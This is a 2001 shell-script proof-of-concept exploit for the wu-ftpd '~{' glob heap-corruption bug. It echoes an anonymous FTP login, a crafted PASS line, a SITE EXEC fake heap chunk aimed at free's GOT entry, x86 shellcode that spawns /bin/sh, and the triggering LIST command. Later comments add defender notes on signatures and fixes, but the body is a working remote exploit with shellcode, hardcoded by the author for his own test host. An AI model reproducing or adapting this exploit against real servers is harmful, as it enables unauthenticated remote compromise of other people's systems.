#!/bin/sh
#Program: wu261
#Program by: lockdown (www.lockeddown.net)
#Date: December 6, 2001
#
#This is proof of concept code for the wuftpd hole found by CORE.  This is not
#portable code, I hardcoded my values which will be useless for anyone else.
#For portable proof of concept code check out zen-parses exploit:
#http://crash.ihug.co.nz/~Sneuro/woot-exploit.tar.gz
#
#Thanks: To zen-parse for all the help, I never would have figured this out
#without him, and to slider for providing me with a box to work on.

#Overview: this script only writes a fixed sequence of FTP control-channel
#commands to stdout. It opens no connection itself, so the output is presumably
#piped into a separate network client that is not shown here -- confirm.
#NOTE(review): per the header, every address below is hardcoded for the
#author's own test host, so the listing is mainly useful as a reference for
#what this attack traffic looks like on the wire.
#Defender notes: the target is the wu-ftpd daemon named in the header. The
#durable fix is a patched or replaced FTP server; disabling anonymous login
#removes the unauthenticated path this script relies on.
#
#pause before sending anything (presumably to let the server greeting arrive)
sleep 2;
#anonymous login: no account on the server is required for what follows
echo -e "USER anonymous\r\n";
#point it to our chunk
#(the password is 24 filler characters followed by 4 raw non-ASCII bytes; a
#PASS argument that carries binary data is unusual and worth alerting on)
echo -e "PASS aaaaaaaaaaaaaaaaaaaaaaaa\x18\xa2\x08\x08\r\n";
#build chunk 0xfffffff0 0xfffffff0 0x0806e064 0x0807fe90
#                                 ^free GOT-12 ^shellcode
#(per the author's labels, the last two words of the fake chunk are the address
#of free's GOT entry minus 12 and the address of the shellcode; the SITE EXEC
#argument repeats one byte pattern several times)
#NOTE(review): treat the labels above as the author's description of intent,
#not as a decoding of the escapes in the string shown below.
echo -e "SITE EXEC \xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xf0\
xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\x06\x008\xf0\xf2\x07
\x008\xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\x06\x008\x
f0\xf2\x07\x008\xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\
x06\x008\xf0\xf2\x07\x008\xf0\xff\xff\xff\xff\xff\xff\xf0\xff\xff\xff\xff\xff\xff\xbc\xda\x06\x008\xf0\xf2\x07\x008\r\n";
#zen-parses shellcode
#(raw machine code sent as a command line of its own; it opens with four spaces
#and a run of 0x90 bytes and ends with the string /bin/sh, both of which are
#simple content signatures when inspecting FTP control traffic)
echo -e "    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0c\xeb\x0c\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x89\xe5\x31\xc
0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\xeb\x41\x5e\xb0\x27\x8d\x5e\x0
5\xb1\xed\xcd\x80\x31\xc9\x31\xc0\xb0\x3d\xcd\x80\xba\x2e\x2e\x2f\xff\xff\x8d\x5
d\x04\xb1\x10\x89\x55\x04\x83\xc5\x03\xe0\xf8\x89\x4d\x04\xb0\x3d\xcd\x80\x89\xf
3\x89\x75\x08\x89\x4d\x0c\xb0\x0b\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xb0\x01\xcd\x8
0\xe8\xba\xff\xff\xff\xff\xff\xff/bin/sh\x00\r\n";
#final command: a LIST whose argument is a tilde followed by an unclosed brace
#NOTE(review): presumably this malformed glob pattern is what reaches the bug
#reported by CORE -- confirm against the advisory. An FTP command argument
#containing "~{" is the most specific indicator in this exchange.
echo -e "LIST ~{\r\n";
#pause again before exiting (presumably so a downstream client stays open long
#enough for the server to process the last command)
sleep 2;

